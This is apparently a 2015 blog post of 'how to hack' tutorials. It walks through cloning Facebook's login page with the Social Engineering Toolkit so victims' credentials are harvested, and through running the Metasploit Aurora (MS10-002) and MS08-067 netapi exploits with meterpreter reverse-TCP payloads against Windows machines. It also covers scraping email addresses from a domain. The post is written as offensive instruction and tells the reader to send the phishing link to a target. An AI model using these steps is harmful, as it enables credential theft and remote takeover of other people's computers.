Saturday, 30 May 2015

How to Hack Gmail, Facebook with Set Tool

First open your terminal and type ifconfig to check your IP


Now Open Social Engineering Toolkit (SET)

goto Applications > Kali  linux > Exploitation Tools > Social Enggineering Toolkit > setoolkit

after clicking on setoolkit following windows will display
now type hit enter



now type


    

now type 4 & hit enter


now type


now type ip adress of attacker which is 192.168.65.128 & website that you want to clone here http://facebook.com hit enter


if set ask for run apache server type y and hit enter 



now open ip address of attacker in browser which is 192.168.65.128 then page will look like real facebook login page send this link to taget (http://192.168.65.128/index2.html) through email or chat 


when victim will fire our link in his browser and type his email id and password then one txt file(harvester.txt) will create in your /var/www/ folder check it. and you will get facebook credentials ☺ ☺ ☺



Hack Remote PC with Aurora Attack

 Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo,Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
Operating System: Windows vista, windows 7, windows server 2008

Requirement
Attacker: Kali Linux
Victim PC: Windows XP
Open terminal type msfconsole



Now type use exploit/windows/browser/ms10_002_aurora


Msf exploit (ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_002_aurora)>set lhost 192.168.65.128 (IP of Local Host)
Msf exploit (ms10_002_aurora)>set srvhost 192.168.65.128 (This must be an address on the local machine)
Msf exploit (ms10_002_aurora)>set uripath rajesh (The Url to use for this exploit)
Msf exploit (ms10_002_aurora)>exploit




Collect Email Address From Website

First open your terminal and type msfconsole


Now type search collector



Now type use auxiliary/gather/search_email_collector
Then type show options


The next step you need to set up the domain you want to locate the email address. Now type set domain (www.example.com)


Hacking Windows xp using Metasploit

Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.


Requirements
  • Kali Linux
  • Windows XP Machine (Target)
Open Your Kali Linux terminal and Type msfconsole hit enter



After getting msfconsole type search netapi hit enter


Now type use exploit/windows/smb/ms08_067_netapi hit enter


now set payload for setting payload type set payload windows/meterpreter/reverse_tcp



now set the required argument by typing show options


for this exploit you have to set the two arguments which is lhost and rhost lhost means local ip address and rhost means our target ip address for local ip address type ifconfig in  new terminal  and for rhost type ipconfig in cmd as follow 





now type set rhost 192.168.65.131 in msfconsole and hit enter

after setting rhost now set the lhost type set lhost 192.168.65.128 hit enter

now the last command is exploit for atttacking our target type exploit after typing exploit if exploit succeed then only our payload will run and meterpreter will be in our hand... ☺ ☺ ☺